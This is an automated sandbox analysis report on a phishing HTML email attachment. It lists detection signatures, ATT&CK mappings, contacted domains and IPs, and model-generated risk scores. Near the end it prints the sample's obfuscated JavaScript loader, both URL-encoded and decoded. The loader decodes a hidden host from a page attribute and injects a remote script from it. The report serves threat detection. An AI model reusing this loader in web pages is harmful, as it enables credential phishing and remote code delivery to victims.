Windows
Analysis Report
ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html
Overview
General Information
Detection
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- chrome.exe (PID: 6396 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "C:\Us ers\user\D esktop\ATT 0100556_so cage.it_Tu esday, May 28, 2024 (1).html" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 7160 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2104 --fi eld-trial- handle=192 4,i,800647 2540143360 931,176869 1661802551 5442,26214 4 /prefetc h:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security | ||
JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |
Click to jump to signature section
AV Detection |
---|
Source: | Avira URL Cloud: |
Phishing |
---|
Source: | File source: | ||
Source: | File source: |
Source: | LLM: |
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | Matcher: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTPS traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | HTTPS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | LNK file: | ||
Source: | LNK file: | ||
Source: | LNK file: | ||
Source: | LNK file: | ||
Source: | LNK file: | ||
Source: | LNK file: |
Source: | Window detected: |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | HTTP Parser: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 Registry Run Keys / Startup Folder | 1 Process Injection | 1 Masquerading | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Registry Run Keys / Startup Folder | 1 Process Injection | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 1 Ingress Tool Transfer | Traffic Duplication | Data Destruction |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | phishing | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
cs1100.wpc.omegacdn.net | 152.199.23.37 | true | false | unknown | |
d2vgu95hoyrpkh.cloudfront.net | 52.85.49.85 | true | false | unknown | |
cs837.wac.edgecastcdn.net | 192.229.133.221 | true | false | unknown | |
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | unknown | |
fiveradio-newbam.com | 104.21.84.200 | true | false | unknown | |
www.google.com | 216.58.212.164 | true | false | unknown | |
s-part-0039.t-0009.t-msedge.net | 13.107.246.67 | true | false | unknown | |
aadcdn.msftauth.net | unknown | unknown | false | unknown | |
www.w3schools.com | unknown | unknown | false | unknown | |
cdn.socket.io | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
false |
| unknown | |
false |
| unknown | |
true |
| unknown | |
false |
| unknown | |
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
216.58.212.164 | www.google.com | United States | 15169 | GOOGLEUS | false | |
13.107.246.45 | s-part-0017.t-0009.t-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false | |
13.107.246.67 | s-part-0039.t-0009.t-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false | |
192.229.133.221 | cs837.wac.edgecastcdn.net | United States | 15133 | EDGECASTUS | false | |
239.255.255.250 | unknown | Reserved | unknown | unknown | false | |
104.21.84.200 | fiveradio-newbam.com | United States | 13335 | CLOUDFLARENETUS | false | |
52.85.49.85 | d2vgu95hoyrpkh.cloudfront.net | United States | 16509 | AMAZON-02US | false | |
152.199.23.37 | cs1100.wpc.omegacdn.net | United States | 15133 | EDGECASTUS | false |
IP |
---|
192.168.2.7 |
192.168.2.9 |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1448976 |
Start date and time: | 2024-05-29 15:05:28 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 46s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultwindowshtmlcookbook.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 12 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html |
Detection: | MAL |
Classification: | mal84.phis.winHTML@30/33@12/10 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 199.232.214.172, 142.250.185.227, 142.250.184.238, 74.125.206.84, 34.104.35.123, 142.250.185.99, 142.250.65.170, 142.251.40.170, 142.251.40.106, 142.250.80.10, 142.251.35.170, 142.250.65.202, 142.251.40.138, 142.250.65.234, 142.250.72.106, 142.250.64.74, 142.250.64.106, 142.251.40.234, 142.250.81.234, 172.217.165.138, 142.251.32.106, 142.251.41.10, 192.229.221.95, 142.250.185.131, 142.250.186.46
- Excluded domains from analysis (whitelisted): logincdn.msauth.net, clients1.google.com, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, slscr.update.microsoft.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com, www.gstatic.com, optimizationguide-pa.googleapis.com
- HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtSetInformationFile calls found.
Input | Output |
---|---|
URL: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html Model: gpt-4o | ```json { "riskscore": 8, "reasons": "The code uses 'document.write' with 'unescape' to inject a script element dynamically. This is a common technique used in malicious scripts to obfuscate the code and load external resources without the user's knowledge. The script sets various attributes including 'src' to an external URL, which could potentially load malicious content. Additionally, the use of 'document.addEventListener' to prevent default actions on context menus suggests an attempt to hinder user actions, which is suspicious behavior." } |
document.write( unescape( '%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%20%20%20%20%76%61%72%20%73%63%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%22%73%63%72%69%70%74%22%29%3B%0A%20%20%20%20%20%20%20%20%73%63%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%22%73%72%63%22%2C%20%22%68%74%74%70%73%3A%2F%2F%63%64%6E%2E%73%6F%63%6B%65%74%2E%69%6F%2F%34%2E%36%2E%30%2F%73%6F%63%6B%65%74%2E%69%6F%2E%6D%69%6E%2E%6A%73%22%29%3B%0A%20%20%20%20%20%20%20%20%73%63%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%22%69%6E%74%65%67%72%69%74%79%22%2C%20%22%73%68%61%33%38%34%2D%63%37%39%47%4E%35%56%73%75%6E%5A%76%69%2B%51%2F%57%4F%62%67%6B%32%69%6E%30%43%62%5A%73%48%6E%6A%45%71%76%46%78%43%35%44%78%48%6E%39%6C%54%66%4E%63%65%32%57%57%36%68%32%70%48%36%75%2F%6B%46%2B%22%29%3B%0A%20%20%20%20%20%20%20%20%73%63%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%22%63%72%6F%73%73%6F%72%69%67%69%6E%22%2C%20%22%61%6E%6F%6E%79%6D%6F%75%73%22%29%3B%0A%20%20%20%20%20%20%20%20%73%63%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%22%74%79%70%65%22%2C%20%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%29%3B%0A%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%29%3B%0A%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%61%64%64%45%76%65%6E%74%4C%69%73%74%65%6E%65%72%28%27%63%6F%6E%74%65%78%74%6D%65%6E%75%27%2C%20%65%76%65%6E%74%20%3D%3E%20%65%76%65%6E%74%2E%70%72%65%76%65%6E%74%44%65%66%61%75%6C%74%28%29%29%3B%0A%20%20%20%20%20%20%20%20%76%61%72%20%73%63%30%64%39%31%36%66%32%64%33%30%65%34%30%38%64%37%30%30%33%30%62%64%33%32%65%30%37%62%62%61%64%35%37%35%32%63%30%38%35%20%3D%20%61%74%6F%62%28%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%68%74%6D%6C%22%29%2E%67%65%74%41%74%74%72%69%62%75%74%65%28%22%70%6F%69%6E%74%22%29%29%3B%0A%20%20%20%20%20%20%20%20%63%6F%6E%73%6F%6C%65%2E%6C%6F%67%28%73%63%30%64%39%31%36%66%32%64%33%30%65%34%30%38%64%37%30%30%33%30%62%64%33%32%65%30%37%62%62%61%64%35%37%35%32%63%30%38%35%29%3B%0A%20%20%20%20%20%20%20%20%76%61%72%20%73%65%39%38%34%32%38%63%64%32%61%64%32%66%37%33%34%32%35%64%30%36%34%66%35%37%37%30%66%36%30%38%39%31%64%34%35%66%61%30%39%5F%38%38%62%32%37%35%66%61%66%32%31%37%66%61%64%39%30%63%37%39%65%63%31%65%65%66%32%34%35%33%62%65%32%31%63%37%34%61%33%39%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%61%74%6F%62%28%22%63%32%4E%79%61%58%42%30%22%29%29%3B%0A%20%20%20%20%20%20%20%20%73%65%39%38%34%32%38%63%64%32%61%64%32%66%37%33%34%32%35%64%30%36%34%66%35%37%37%30%66%36%30%38%39%31%64%34%35%66%61%30%39%5F%38%38%62%32%37%35%66%61%66%32%31%37%66%61%64%39%30%63%37%39%65%63%31%65%65%66%32%34%35%33%62%65%32%31%63%37%34%61%33%39%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%61%74%6F%62%28%22%63%33%4A%6A%22%29%2C%20%73%63%30%64%39%31%36%66%32%64%33%30%65%34%30%38%64%37%30%30%33%30%62%64%33%32%65%30%37%62%62%61%64%35%37%35%32%63%30%38%35%20%2B%20%61%74%6F%62%28%22%4C%32%70%7A%62%6D%39%74%4C%6D%70%7A%22%29%29%3B%0A%20%20%20%20%20%20 | |
URL: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html Model: gpt-4o | ```json { "riskscore": 7, "reasons": "The code dynamically creates and appends script elements to the document head, which can be used to load external scripts. The use of 'atob' to decode base64 strings and the obfuscation of variable names increases the difficulty of understanding the code, which is a common technique in malicious scripts. Additionally, the prevention of the context menu could be an attempt to hinder user inspection. These factors combined suggest a higher risk of malicious intent." } |
var sc = document.createElement("script"); sc.setAttribute("src", "https://cdn.socket.io/4.6.0/socket.io.min.js"); sc.setAttribute("integrity", "sha384-c79GN5VsunZvi+Q/WObgk2in0CbZsHnjEqvFxC5DxHn9lTfNce2WW6h2pH6u/kF+"); sc.setAttribute("crossorigin", "anonymous"); sc.setAttribute("type", "text/javascript"); document.head.appendChild(sc); document.addEventListener('contextmenu', event => event.preventDefault()); var sc0d916f2d30e408d70030bd32e07bbad5752c085 = atob(document.getElementById("html").getAttribute("point")); console.log(sc0d916f2d30e408d70030bd32e07bbad5752c085); var se98428cd2ad2f73425d064f5770f60891d45fa09_88b275faf217fad90c79ec1eef2453be21c74a39 = document.createElement(atob("c2NyaXB0")); se98428cd2ad2f73425d064f5770f60891d45fa09_88b275faf217fad90c79ec1eef2453be21c74a39.setAttribute(atob("c3Jj"), sc0d916f2d30e408d70030bd32e07bbad5752c085 + atob("L2pzbm9tLmpz")); se98428cd2ad2f73425d064f5770f60891d45fa09_88b275faf217fad90c79ec1eef2453be21c74a39.setAttribute(atob("dHlwZQ=="), atob("dGV4dC9qYXZhc2NyaXB0")); document.head.appendChild(se98428cd2ad2f73425d064f5770f60891d45fa09_88b275faf217fad90c79ec1eef2453be21c74a39); |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
239.255.255.250 | Get hash | malicious | HtmlDropper, HTMLPhisher | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
13.107.246.45 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Ursnif | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
13.107.246.67 | Get hash | malicious | Ursnif | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | Fake Captcha, HTMLPhisher | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | TechSupportScam | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Outlook Phishing, HTMLPhisher | Browse | |||
104.21.84.200 | Get hash | malicious | HTMLPhisher | Browse | ||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
192.229.133.221 | Get hash | malicious | HTMLPhisher | Browse | ||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
cs837.wac.edgecastcdn.net | Get hash | malicious | HTMLPhisher | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
d2vgu95hoyrpkh.cloudfront.net | Get hash | malicious | HTMLPhisher | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
s-part-0017.t-0009.t-msedge.net | Get hash | malicious | Ursnif | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
fiveradio-newbam.com | Get hash | malicious | HTMLPhisher | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
cs1100.wpc.omegacdn.net | Get hash | malicious | HTMLPhisher | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
MICROSOFT-CORP-MSN-AS-BLOCKUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Ursnif | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
MICROSOFT-CORP-MSN-AS-BLOCKUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Ursnif | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | FormBook | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | HtmlDropper, HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer, XWorm | Browse |
| ||
EDGECASTUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
|
